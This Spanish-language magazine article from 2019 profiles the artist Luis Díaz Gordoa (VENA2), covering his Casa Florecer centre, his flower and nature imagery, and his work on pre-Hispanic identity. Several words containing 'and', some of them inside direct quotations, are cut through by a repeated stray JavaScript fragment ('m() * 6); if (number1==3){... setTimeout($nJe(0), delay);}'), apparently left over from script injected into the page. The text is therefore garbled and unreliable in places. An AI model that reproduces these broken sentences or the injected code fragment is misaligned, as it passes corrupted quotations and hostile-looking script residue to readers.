Las obras artísticas de Luis Díaz Gordoa

    Las obras artísticas de Luis Díaz Gordoa

    El guanajuatense, busca venerar a “la Madre Tierra” a través de sus obras, conócelo.

    Autor: Ulises López 21 agosto, 2019


    Foto: Jorge Ramírez-Posada

    Por Ulises López

     

    Hicimos una cita para conocer el trabajo de Luis Díaz Gordoa, conocido en el medio artístico como Vena2; nos recibió en un maravilloso espacio.

    El encuentro se llevó a cabo en Casa Florecer, centro de desarrollo de conciencia y bienestar ubicado en el corazón de la colonia Cuauhtémoc. Este sitio es un proyecto del artista VENA2, Luis Díaz Gordoa, quien junto a su madre y hermano han creado un espacio en el cual se puedan compartir distintas herramientas que ayuden al desarrollo personal. El recinto conjuga el conocimiento, acumulado durante años, con parte de su trabajo visual y lleva como misión honrar a la vida y florecer.

    Al inicio de su carrera como diseñador, Luis ilustró las portadas de los discos de reconocidos músicos como Natalia Lafourcade, Molotov, Juanes y Liquits. Después, desde hace más de quince años, viró hacia la creación de obras artísticas por lo que ha sido invitado para exponer en varios lugares, entre ellos Nueva York y Japón, países donde presentaría conceptos como el de Florecer.

    La idea de este proyecto es la utilización de distintos componentes en el arte para transmitir valores de sanación que se encuentran al interior de las flores, que en su conjunto visualmente crean formas geométricas guardandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando un equilibrio armónico. Al respecto nos dice, empleandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando una metáfora, en comparación con las personas: “Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando una planta florece es cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando está en la mejor versión de sí misma, en todo su esplendor y belleza, es decir, está lista para procrear la vida”.

     

    Y es que la naturaleza es un tema recurrente en el guanajuatense, quien busca venerar a “la Madre Tierra” a través de su obra e incluso su nombre artístico es signo de esa sensibilidad: “tengo mucha empatía con el venado, en la mitología sus cuernos se asemejan a las ramas de las plantas, y por ello son como mensajeros de la naturaleza”. VENA2 también ha buscado incorporar algunos elementos tecnológicos a su trabajo, ya que considera que estos son el resultado material de nuestra evolución como humanidad y tendrían que ser empleados sabiamente: “La tecnología nos acerca a la naturaleza a través de la conciencia. Las sociedades más conscientes son las que utilizan los recursos que tenemos para poder funcionar íntegramente con ella. El uso de la tecnología representa una responsabilidad, esa es la libertad que tenemos”.

     

     

    Esta conciencia lo ha llevado al estudio de las culturas prehispánicas, a las que considera que vivían en una relación más armónica con la tierra: “hay cosas que no sabemos de nuestra cultura y que a mí me fascinan como tema, nuestra historia está llena de valores, nada más que la tenemos sepultada”. Es por ello que se encuentra trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en una nueva serie sobre el pasado, en donde reflexiona sobre el significado de lo que es ser mexicano y en su propio proceso como artista en cuanto a la identidad, ya que considera: “entre más conoces tus raíces, más te conoces a ti mismo”. Esto también lo ha llevado a intervenir distintos espacios con esa temática e incluso a hacer una campaña para Jhonie Walker que tiene al dios Huitzilopochtli como eje temático.

    En 2021 se conmemoran 500 años de la caída de Tenochtitlán y su misión está encaminada a difundir un contenido de carácter social, pues considera que “el principal de los problemas sociales que tenemos es la desigualdad gestada desde el momento de la conquista”.

    Ha empezado a intervenir diversos espacios en donde puede aportar el aprendizaje que le han dejado los temas que ha explorado, para plantear alternativas que ayuden a construir una sociedad que recupere valores comunitarios: “Somos una sociedad planetaria en donde la unidad es la bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andera y hemos llegado al punto en donde todas las herramientas están dadas para poder equilibrar nuestro planeta”.

     

    Si quieres conocer un poco más de su obra, visita su página VENA2.com o dale un vistazo en redes sociales, donde lo encuentras como VENA2.

     

    NEON CARON, ARTISTA PLÁSTICO CREADOR DE UNA APP / OBRA DE ARTE

    Temas relacionados con esta nota: , , ,

El guanajuatense, busca venerar a “la Madre Tierra” a través de sus obras, conócelo.